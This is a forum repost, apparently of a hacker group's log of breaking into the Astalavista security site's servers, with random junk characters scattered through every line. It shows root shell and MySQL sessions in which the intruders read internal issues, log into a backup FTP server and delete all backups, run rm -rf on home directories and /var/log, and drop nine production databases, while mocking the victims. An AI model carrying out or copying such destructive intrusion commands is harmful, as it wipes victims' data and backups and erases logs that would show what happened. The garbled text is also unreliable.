+——————+———————————————————————————————+( u2 B. ~; n- F- A5 s: P; y
| Website guidance | Virtual Girl which guides you trought the website.2 p8 c: X- R9 R# i2 w8 K) {/ k; E1 H
5 g# v4 s# l, {
We need a girl with who you can ( talk )!!!
; i& w6 A2 d0 j3 r, M$ w9 bAlso for the News!
  U) v9 X; M' K) [) e- TSo my suggestion is a girl who read you the news loud if you like!
- i% U  Q3 ^6 k& K) kyou can choose between read yourselfe or she read it for you or both!. X! o% @, x, Q

6 s) b& ]2 A) c, j9 K' UGo to 链接标记[url]www.heise.de[/url]! There is an example for Voice News! It’s a good thing!!!, d- E. o( O+ [  V

7 E* n3 M5 K2 k6 P# x: [2 CHave a look on the example girls!!
- J4 D" }/ I6 n6 R2 F: K& }! G9 i% Z7 V6 u: W7 X7 n  a$ ]- N' G
链接标记[url]http://www.yaoti.com/de/free_yaoti.html[/url]
* w, B3 f7 S6 k! c& Y' l; ]$ e+ a& Q% z0 J, i" U8 }
or that* G; v8 _) U% C; I3 W; B" q* Y
6 G% Y2 _# R5 A
链接标记[url]http://www.yellostrom.de/[/url]
$ j$ C' ^  O' i# K; \; k0 `5 ]6 v3 v/ C6 R! m# S4 y# O4 ?
|
1 l- N: y) ]+ x7 {* P+——————+———————————————————————————————+
/ R2 ?9 _  Z# N% l! x  e1 row in set (0.00 sec)
  s0 i& d# }$ t  n0 K& A, `* w  G- z% _
// ha ha.
1 j" ^; {3 ~) Q/ P. G
, W) g5 y5 t- G: [% z* `' Pmysql> select iss_summary,iss_description from eventum_issue where iss_id = 7;. ~8 K% ]( l% Y2 g6 B7 b
+————————–+———————————————————————————————————–+
% \: w9 ^4 E! ~5 {# @| iss_summary              | iss_description                                                                                           |4 ?% ?4 J( f' x& {. Q, d/ F( k
+————————–+———————————————————————————————————–+( O* F' H6 s4 a/ _2 [! B
| Exploit Development Team | We need an exploit development team to focus on exploit research and publication under Astalavista name.  |* P6 @- |  o7 [  X6 p( t( Z/ ?3 X
+————————–+———————————————————————————————————–+6 e7 k& J: t7 ?% g
1 row in set (0.00 sec)/ ]% i9 Z% ?' N! r( Q8 E% C

& L/ _/ Q0 ]8 \5 r% @1 H1 P// LOL.3 [2 H% _+ K; ^; c1 g

# y% {3 C. x5 u8 k9 jmysql> exit, [; E7 v- ~4 J0 u: o+ D
Bye) `  t$ d  i1 m

  \; d/ B2 o- K9 w2 P& A% P+ xsh-3.2# ftp 212.254.194.163
" c1 |& _1 K, s$ jConnected to 212.254.194.163.
( r% v! K. x- F2 i220 BackupCOM_VW FTP server ready.
, |* P# G& {2 j8 ?504 AUTH: security mechanism ‘GSSAPI’ not supported.# h7 k, r0 t: G! L* g, Z9 Y
504 AUTH: security mechanism ‘KERBEROS_V4′ not supported.
$ ]! U' w- T% M+ g5 A" p- NKERBEROS_V4 rejected as an authentication type: G1 b. X9 y9 J+ F, z1 f
Name (212.254.194.163:root): astalavista.com7 A  p- ?. K: V  G; I
331 Password required for astalavista.com.
4 Z  c" R' ?0 Y# hPassword:
& Y- R3 ]; m( Q230 User astalavista.com logged in.. q% h  y5 {- ~& y/ i) M! D) U
Remote system type is UNIX.  }. ^* J9 D% J+ B. T  J% D6 T/ C
Using binary mode to transfer files.
. r/ r5 R# t* B' o' dftp> ls -la! `# s; |9 R3 \# O1 r: B
227 Entering Passive Mode (212,254,194,163,2,188); J: s1 |  V2 G6 @! ?7 i4 g
150 Opening BINARY mode data connection for ‘file list’.
1 s. D1 \" n7 @' \; [5 v& Xdr-x——   1 root users         4096 Jun  4 06:13 astalavista.com/ c) s  ?8 I# D5 Y% N6 g7 h, a
226 Transfer complete.
6 G; Q4 ?# \/ x+ Qftp> cd astalavista.com# w: b3 Q  G9 q; o
250 CWD command successful.6 N  M7 X' m- _; Z! [
ftp> ls -la3 z7 P" H. P/ [3 k' t; c# l4 D
227 Entering Passive Mode (212,254,194,163,2,189)+ }* a6 I( X6 y
150 Opening BINARY mode data connection for ‘file list’.0 K7 N! V/ ^8 Z  j: R" l
-rw-rw-rw-   1 astalavista.com users     23410936878 Apr 29 22:10 09-04-28-astacom_full.tar! s% f4 a) x% m+ u. I5 o% W5 P
-rw-rw-rw-   1 astalavista.com users     20617651590 Apr 29 14:18 09-04-28-astacom_full.tar.bz2
/ b; _, p& C4 u) `-rw-rw-rw-   1 astalavista.com users        88287111 Apr 29 15:57 09-04-29-astacom_sql_full.sql.tar.bz2
$ t8 \, t; s2 O, u3 |  [-rw-rw-rw-   1 astalavista.com users     26413034040 May  2 00:21 09-05-01-astacom-Public_HTML.tar9 M/ M; A: ]& a+ h% D
-rw-rw-rw-   1 astalavista.com users       277843549 May  1 17:29 09-05-01-astacom-SQL_Dump.tar2 }8 f. j2 Q6 }% ~# U
[snip]
5 U5 g' m3 l  c; f2 t: P226 Transfer complete.
2 x- |" @/ @; `, qftp> mdelete *3 G+ @: `3 x' S- J+ W  b3 t
ftp> ls -la
6 a9 O$ R% M# U# }% `227 Entering Passive Mode (212,254,194,163,2,193)
! c5 K! U. n& |; D150 Opening BINARY mode data connection for ‘file list’.
  [$ l+ e2 f2 I# }226 Transfer complete.5 Q) m$ b' H) }' ~; g  D  ?7 L7 W
ftp>
! A# P1 P% _8 a1 g7 c# w
8 V1 N8 V+ \# K* O( m+ [9 T0 msh-3.2# cd /home
) `. W3 F3 L4 G% `2 F; Esh-3.2# ls -la0 }! t- E1 B" z; [& K$ q7 s% |
total 120/ }# \: z4 }. p+ v' r+ t  k9 I- b
drwxr-xr-x 14 root    root     4096 Mar 11 17:56 .
% d2 F: B, Q- m: P/ G$ Hdrwxr-xr-x 25 root    root     4096 Jun  3 02:43 ..# g2 n* [9 t, Z- W0 u; M
drwx–x–x  9 admin   admin    4096 Nov 28  2007 admin
2 c/ s& A  y6 L8 [' e& p% p. r. {! C-rw——-  1 root    root     8192 Jun  4 03:03 aquota.group
( z4 m8 d7 i9 N-rw——-  1 root    root     8192 Jun  3 02:45 aquota.user$ \0 a' y: G9 A& h) g5 o6 w/ c% {) q! {
drwx–x–x  6 astanet astanet  4096 Jun  4 09:51 astanet
8 C6 b. w# Y1 X& e3 sdrwxr-xr-x  2 root    root     4096 Jul 29  2008 backup/ m4 M; j! M1 j4 e; z  R) p5 S: ^
drwxr-xr-x  2 root    root     4096 Sep 17  2008 backup.141610 c+ y9 L3 B2 D/ F4 o* ]5 y. N
drwx–x–x 10 com     com      4096 Apr 28 12:40 com1 W+ o! m! _+ @  j
drwxr-xr-x  2 root    root     4096 May 17  2007 ftp
0 n; S9 P- o( Y8 P, o5 R0 f5 sdrwx——  3 jon     jon      4096 Sep 21  2007 jon
! n  T7 c: ]3 `# Qdrwx——  2 root    root    16384 Sep 11  2007 lost+found; S( E1 A! X3 B- N' g6 V: M
drwxr-xr-x  2 root    root     4096 Sep 14  2007 my
4 ?. s. q: Y8 T) m# z0 Ndrwxr-xr-x  5 mysql   mysql    4096 Sep 24  2007 mysqldata: L  V' b* I! o" I3 p0 N8 `4 k
drwx——  2 jon     jon      4096 Sep 15  2007 test: m; g  i+ l8 p, m8 g% |
drwxrwxrwt  2 root    root     4096 Jul 29  2008 tmp
5 Q5 }  L# f- J) \8 H. x* M& S1 b; D- p  l) a0 C6 `/ X7 G$ m
sh-3.2# rm -rf backup/
1 s9 _# ]$ \/ X( Wsh-3.2# rm -rf backup.14161/
5 X' K: d' ^( x) Ush-3.2# rm -rf ftp/4 S' F' R2 Q# ?7 a- @
sh-3.2# rm -rf jon/
1 x  [% u% K0 I' _; ]sh-3.2# rm -rf my/: r% [: U% c4 N2 }4 `3 F3 b- B9 M
sh-3.2# rm -rf mysqldata/8 C* ]( F; D7 z+ Q7 |1 f% b
sh-3.2# rm -rf test/: D; d1 V% L; l3 c# Z
sh-3.2# rm -rf tmp/6 p( `% o( V" E
sh-3.2# cd ~! [4 X9 d1 Q* ~
sh-3.2# rm -rf ** c8 ^! b9 e/ z5 l% ?( O. q
sh-3.2# rm -rf /var/log// r& z9 r/ O# u! `$ q
rm: cannot remove directory `/var/log//proftpd’: Directory not empty% l& I' w+ L4 m: e& {7 R
sh-3.2# rm -rf /home/*
2 [) T/ e, A) i- w0 tsh-3.2# mysql
% m2 ?9 E8 P3 Y- S& m5 @) ?$ HWelcome to the MySQL monitor.  Commands end with ; or \g.
: Q" o. N7 X, [Your MySQL connection id is 407156. ?9 [8 [7 d6 N  A: J: M6 E! V6 M
Server version: 5.0.45-community-log MySQL Community Edition (GPL)
& a. }- C1 g; w- l' Q) S6 x9 T5 B6 a+ }: d9 l
Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.* r' \! M( [) l! y6 w2 P

! m( t+ Q: m+ }mysql> show databases;
1 o+ V% P" C2 _. \9 I6 b) v" Y+———————–+
: b6 ~  E+ b) T3 O1 r/ Q- _! r| Database              |6 z6 f6 j4 y$ ?) U1 ~
+———————–+6 X% @- W% D6 i; q
| information_schema    |
3 c( H  ^9 U1 Z- Z  Z1 Q| astanet_ads           |
, B1 h: d: F1 q0 `& D| astanet_mailing_lists |
* b  |( ~. G. j1 x  V| astanet_mediawiki     |
" i$ W5 U" J+ |" j| astanet_membersystem  |# t' [: d# D4 |
| com_contrexx          |
2 |# B* v  o2 E| com_contrexx2         |3 C0 `( Q. H% s0 x! d
| com_contrexx2_live    |
' k$ |4 w; _- `, l$ q. k| da_roundcube          |
) @8 ~7 e8 E1 f8 b4 o3 F| dolphin               |
8 w3 d2 y; Z3 Q* I| ideapool              |  u& M4 ]" h2 |0 w
| mysql                 |: W( u1 |7 V3 [6 ^& j
| test                  |; Q* [6 ^) v* e: K8 [0 b" R  x. z5 ^
| yourmaster            |- d6 x( N1 c# U3 Z
+———————–+
. y3 H' ?0 }4 j+ `9 A9 D$ s14 rows in set (0.03 sec)
! W( V4 S. w* l% K$ @* d$ c' X6 m$ D5 W
mysql> drop database astanet_membersystem;
- x) i9 C1 X9 X) K# [droQuery OK, 46 rows affected (0.81 sec)
3 n+ {1 U( D4 I7 v- \3 P
# V5 B% i; Q6 mmysql> drop database com_contrexx;4 [# R& \( O) d; j
Query OK, 211 rows affected (2.72 sec)  e3 n6 v' [' s3 P; v0 T

* c) N1 O$ G$ p3 C* {" x* Nmysql> drop database com_contrexx2;; _: _3 u9 w7 t9 z# Y
Query OK, 237 rows affected (2.23 sec)4 o8 K# X8 l9 g" l1 b& ~' u
' \: o! h" d: N$ ]5 u& i
mysql> drop database com_contrexx2_live;
; J' ]; Z; x8 `3 M' U5 t$ Y, CQuery OK, 227 rows affected (7.63 sec)! C) e7 n; E, b. e  W8 C

8 Q$ t2 D9 C9 h' t2 }6 gmysql> drop database ideapool;8 \5 B5 d% ~% D) [/ r5 @
Query OK, 69 rows affected (0.19 sec)
9 W/ u% a! _3 j& ]1 v& q# T5 M- |8 U, L7 L3 D, ~
mysql> drop database yourmaster;3 F, ^5 l1 L, ]; o/ D1 ?  [
Query OK, 158 rows affected (0.55 sec)
: C2 m; S% x3 ?2 c6 ?. O' z8 x9 E$ ]- u3 m( |# |
mysql> drop database astanet_ads;6 S/ l( W4 A) D; Y& C) y
Query OK, 9 rows affected (0.11 sec)5 Y8 Q3 ?  u( a/ ?9 ]3 \- A+ {

# x6 P( P+ R# b( J! smysql> drop database astanet_mailing_lists;; o0 {1 D8 E1 ~# I/ _9 J
Query OK, 24 rows affected (1.47 sec). Z+ N! h1 i" f0 l
2 r( }4 V  d( G; S5 n% A  `8 a" V
mysql> drop database astanet_mediawiki;
$ `5 |$ P  O9 ]- t& c9 j. R) CQuery OK, 31 rows affected (0.51 sec)
: G" [+ ?# M7 `
% L8 Y6 e- s) M0 Tmysql> show databases;
1 y3 e1 u! ~; q; f/ y5 [# S: q* v+——————–+* S6 `- z5 D9 I+ X# Q
| Database           |- `6 R6 L; V; ?! x# C1 u& ]
+——————–+6 i8 L% P/ ]" g; T
| information_schema |7 L  V3 U2 Y8 ~2 i- s
| da_roundcube       |# o& P4 j* u% t0 j5 a3 _! O
| dolphin            |/ e- u3 w$ k7 h% ?  X4 [
| mysql              |
: Z/ a+ I6 n7 d| test               |* j# Y& \  \# U- ], z+ d  S
+——————–+
7 q  {$ v3 B6 m7 ~: [0 ?( s0 B$ l5 rows in set (0.00 sec)' U& Q; C0 b6 v9 o/ @/ X; e

: Q3 X2 e2 \% D$ m0 a4 L9 EWhat a journey! We’re not sure exactly why the “Terminator” had any influence on2 S* ], p+ ]8 B% }7 q/ e
their naming (conventions) but we’re sure Arnold himself wouldn’t be in the
: J0 {$ N" d( R/ X8 wwrong to say this pack of morons *wont be back*.
2 D" r2 ^: c1 i4 v



欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2